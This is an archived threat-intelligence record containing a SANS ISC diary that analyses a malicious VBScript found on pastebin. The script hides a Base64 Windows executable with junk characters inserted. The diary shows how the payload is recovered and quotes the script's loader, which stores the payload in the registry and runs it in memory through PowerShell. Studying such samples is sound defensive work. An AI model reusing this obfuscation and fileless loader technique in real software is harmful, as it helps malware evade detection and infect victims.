{
	"id": "3baa5a67-6d16-4ab4-92e7-4980a9bf86ea",
	"created_at": "2026-04-06T00:17:30.507749Z",
	"updated_at": "2026-04-10T13:12:07.475841Z",
	"deleted_at": null,
	"sha1_hash": "5240476ab8b5103b068116acc3544a7c438db28f",
	"title": "A VBScript with Obfuscated Base64 Data - SANS ISC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 879925,
	"plain_text": "A VBScript with Obfuscated Base64 Data - SANS ISC\r\nBy SANS Internet Storm Center\r\nArchived: 2026-04-05 18:17:04 UTC\r\nA few months ago, I posted a diary to explain how to search for (malicious) PE files in Base64 data[1]. Base64 is\r\nindeed a common way to distribute binary content in an ASCII form. There are plenty of scripts based on this\r\ntechnique. On my Macbook, I'm using a small service created via Automator to automatically decode highlighted\r\nBase64 data and submit them to my Viper instance for further analysis:\r\nBut yesterday, I found, on pastebin.com[2], a malicious WScript file with a Base64 string that did not decode. The\r\nscript ended with an error \"Invalid character in input stream”. I had a quick look at the script and found indeed\r\nunexpected characters randomly spread in the Base64 data:\r\nH=\"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIb\r\ngBTM~*hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ~*KJAAAAAAAAABQRQAATAEDAGGnBFkAAAAAAAAAA\r\nOAAAgELAQsAALIAAAAIAAAAAAAAjtEAAAAgAAAA4AAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAAAgAQAAAgAAAAAAAAIAQI\r\nUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAADTRAABXAAAAAOAAAPgEAAAAAAAAAAAAAAAAAAAAAAAAAAABAAwAAAD8zwA\r\nAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAA\r\nAC5~*ZXh~*AAAAlLEAAAAgAAAAsgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAPgEAAAA4AAAAAYAAAC~*AAAAAAAAAAAAAA\r\nAAAABAAABAL...(redacted)\r\nIf you check in the VBScript code, you'll indeed see an instruction to replace those unexpected characters from the\r\nBase64 string:\r\n$_b=$_b.replace('~*','0’);\r\nWhen just replace the string by ‘0’ as stated in the script, you get back the malicious PE file:\r\n$ sed \"s/\\~\\*/0/g\" base64.txt | base64 -d \u003ebase64.exe\r\n$ file base64.exe\r\nfoo.exe: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows\r\nhttps://isc.sans.edu/diary/rss/22590\r\nPage 1 of 2\n\n$ md5sum base64.exe\r\n07be65dedbee0ef5582f0eff5dd4d804 base64.exe\r\nThe file is, of course, malicious as reported by VT[3].\r\nFinally, a quick remark about the script itself: it uses the Windows registry to store the payload and execute it:\r\nO.regwrite D,H,\"REG_SZ\"\r\nO.Run C \u0026 chrw(34) \u0026 \"$_b = (get-itemproperty -path 'HKCU:\\SOFTWARE\\Microsoft\\' -name 'KeyName').KeyN\r\n$_b=$_b.replace('~*','0');\r\n[byte[]]$_0 = [System.Convert]::FromBase64String($_b);\r\n$_1 = [System.Threading.Thread]::GetDomain().Load($_0);\r\n$_1.EntryPoint.invoke($null,$null);\" \u0026 Chrw(34),0,false\r\nXavier Mertens (@xme)\r\nISC Handler - Freelance Security Consultant\r\nPGP Key\r\nSource: https://isc.sans.edu/diary/rss/22590\r\nhttps://isc.sans.edu/diary/rss/22590\r\nPage 2 of 2",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://isc.sans.edu/diary/rss/22590"
	],
	"report_names": [
		"22590"
	],
	"threat_actors": [],
	"ts_created_at": 1775434650,
	"ts_updated_at": 1775826727,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5240476ab8b5103b068116acc3544a7c438db28f.pdf",
		"text": "https://archive.orkl.eu/5240476ab8b5103b068116acc3544a7c438db28f.txt",
		"img": "https://archive.orkl.eu/5240476ab8b5103b068116acc3544a7c438db28f.jpg"
	}
}